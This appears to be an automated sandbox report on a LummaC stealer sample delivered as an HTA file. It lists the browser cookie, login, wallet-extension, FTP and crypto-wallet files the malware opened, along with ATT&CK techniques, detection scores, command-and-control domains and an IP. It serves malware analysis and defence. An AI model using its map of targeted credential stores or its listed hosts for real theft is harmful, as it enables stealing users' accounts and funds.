Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ			Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
web44.mp4.hta	0%	ReversingLabs
web44.mp4.hta	2%	Virustotal		Browse

Source	Detection	Scanner	Label
https://noisercluch.click/api=	100%	Avira URL Cloud	malware
https://noisercluch.click/	100%	Avira URL Cloud	malware
https://noisercluch.click/api8)	100%	Avira URL Cloud	malware
https://noisercluch.click/api	100%	Avira URL Cloud	malware
noisercluch.click	100%	Avira URL Cloud	malware
https://go.mic	0%	Avira URL Cloud	safe
https://cc.klipjaqemiu.shop/web.png	0%	Avira URL Cloud	safe
https://cc.klipjaqemiu.shop	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cc.klipjaqemiu.shop	188.114.96.3	true	true		unknown
noisercluch.click	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
https://noisercluch.click/api	true	Avira URL Cloud: malware	unknown
rebuildeso.buzz	false		high
noisercluch.click	true	Avira URL Cloud: malware	unknown
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
hummskitnj.buzz	false		high
https://cc.klipjaqemiu.shop/web.png	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://noisercluch.click/api=	powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.mic	powershell.exe, 00000002.00000002.1698936708.00000000004E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cc.klipjaqemiu.shop	powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://noisercluch.click/	powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2888738105.0000000003688000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2889805623.0000000005931000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	false		high
https://noisercluch.click/api8)	powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	false		high
http://en.w	mshta.exe, 00000000.00000003.1725019421.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725177020.0000000006692000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722082534.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725151894.000000000668F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1721997888.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1728590265.0000000006693000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1724065877.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722157514.000000000668A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	cc.klipjaqemiu.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583047
Start date and time:	2025-01-01 17:09:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	web44.mp4.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@9/6@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 178 Number of non-executed functions: 56
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 6616 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7164 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:10:00	API Interceptor	55x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
noisercluch.click	web44.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	172.67.219.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	1.ps1	Get hash	malicious	Unknown	Browse	188.114.96.3
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	OPRfEWLTto.js	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK	Get hash	malicious	Unknown	Browse	188.114.96.3
	over.ps1	Get hash	malicious	Vidar	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PASS-1234.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8979
Entropy (8bit):	4.866537018464794
Encrypted:	false
SSDEEP:	192:Zxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smtjBrdcU6CDR:H1VoGIpN6KQkj2qkjh4iUxCdMUib4
MD5:	C5F74029744D2B4244E38C45B36E9035
SHA1:	804BE0E38E7D982BD937AE2B4F71EC0B23BF959A
SHA-256:	6B3BDDE6B61F7FB780B78D20B1C205C6B15C0E515DBBD9A4EDD5C9A79F2AD258
SHA-512:	8209B2FF16422EDB16E995D0CF2E07947FBBDD26F13BF654D655C9E4858F266B8D7CE766D47B5955AEEECC0883AD7FDADAB6C3493B54F9EFF008EE541D0F543D
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1300
Entropy (8bit):	5.395716438237918
Encrypted:	false
SSDEEP:	24:3tWSKco4KmM6GjKbmOIKo+mZ9tYs4RPQoUEJ0gt/NK3R8QHrg+:9WSU4Yymp+mZ9tz4RIoUl8NWR8QHt
MD5:	13243E8F879F6C8A929F9BA8987649AC
SHA1:	801C7EC5D76AE82B3877A6CA1BB0221F6EE5F707
